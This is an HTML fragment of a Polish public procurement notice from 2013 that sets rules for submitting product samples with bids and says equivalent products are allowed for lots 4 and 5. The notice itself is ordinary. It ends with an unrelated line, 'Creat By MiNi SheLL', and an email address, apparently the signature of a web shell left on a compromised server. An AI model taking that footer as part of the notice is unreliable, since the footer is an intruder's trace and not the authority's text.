<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wymagane jest nieodpłatne dostarczenie wraz z ofertą przetargową próbek oferowanego asortymentu w zakresie pakietu nr: 1,2, 3,4,5,8,9A,10,11,14,15,16,17,21,22,23,24,25,26,27,28.
-Próbki należy złożyć osobno w trwale zamkniętym jednym opakowaniu.
-Oferta przetargowa nie może być złożona w opakowaniu zawierającym próbki.
-W przypadku złożenia oferty w jednym opakowaniu z próbkami, oferta nie będzie otwarta podczas publicznego otwarcia ofert, gdyż Zamawiający nie przewiduje otwierania próbek podczas otwarcia ofert. 
-Na opakowaniu zawierającym próbki należy umieścić dokładny opis postępowania, nr ZP)10)2013 + napis PRÓBKI
-Próbki należy dostarczyć w miejsce i w terminie wyznaczonym na składanie ofert tj. do dnia 28.06.2013r do godz. 12:230 
Zamawiający zwraca wykonawcom, których oferty nie zostały wybrane, na ich wniosek, złożone przez nich próbki.

Dostarczone próbki będą wykorzystywane podczas oceny zgodności oferowanych produktów z wymaganiami Zamawiającego. 
Nie złożenie próbek spowoduje odrzucenie oferty.
Zamawiający dopuszcza złożenie oferty równoważnej pod warunkiem spełnienia parametrów technicznych, użytkowych i funkcjonalnych zawartych w Opisie przedmiotu zamówienia, w zakresie pakietów: 4 i 5

(wyrób równoważny to taki, który ma te same cechy funkcjonalne co konkretny produkt wskazany w opisie przedmiotu zamówienia z nazwy lub pochodzenia, o nie gorszej jakości, o właściwościach takich samych lub zbliżonych do opisu przedmiotu zamówienia, oznaczony innym znakiem towarowym, patentem lub pochodzeniem)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com